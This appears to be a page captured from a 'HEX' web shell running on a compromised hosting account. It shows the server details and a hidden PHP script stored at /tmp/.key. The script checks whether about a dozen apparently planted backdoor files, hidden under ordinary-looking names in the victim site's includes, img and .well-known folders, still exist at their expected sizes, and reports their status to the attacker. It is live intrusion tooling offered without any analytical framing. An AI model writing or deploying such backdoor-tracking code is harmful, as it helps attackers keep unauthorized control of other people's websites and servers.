HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.key
<?php   $r = '/home/vitanhod/prostanur1.vitavit.com.pk'; $x = ["/includes/config.php"=>"bd@@1410520@@78",
"/img/pub.php"=>"bd@@1280778@@89",
"/includes/folderlist.php"=>"bd@@1410532@@40",
"/multigenerator.php"=>"bd@@1280730@@22",
"/orderemail_bk.php"=>"bd@@1410496@@76",
"/.well-known/Beauty.php"=>"bd@@1410453@@99",
"/.well-known/pki-validation/class.issue.php"=>"bd@@1309819@@986",
"/.well-known/tbl_properties.php"=>"bd@@1409108@@840",
"/includes/Z.php"=>"bd@@1409122@@928",
"/includes/Z.php"=>"bd@@1410474@@59",
"/img/uploadbplan.php"=>"bd@@1410548@@919",
"/swedish_mimes.php"=>"bd@@1410559@@872"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');